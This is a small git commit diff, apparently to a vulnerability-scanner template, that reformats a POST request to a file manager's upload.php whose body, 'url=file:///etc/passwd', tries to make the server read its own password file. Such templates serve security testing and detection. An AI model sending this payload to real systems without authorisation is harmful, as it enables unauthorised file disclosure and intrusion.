fixing the template
parent
4d5bdb15e4
commit
8314cf90b7
|
@ -9,8 +9,8 @@ requests:
|
|||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/filemanager/upload.php"
|
||||
body:
|
||||
- "fldr=&url=file:///etc/passwd"
|
||||
|
||||
body: 'fldr=&url=file:///etc/passwd'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
|
|
Loading…
Reference in New Issue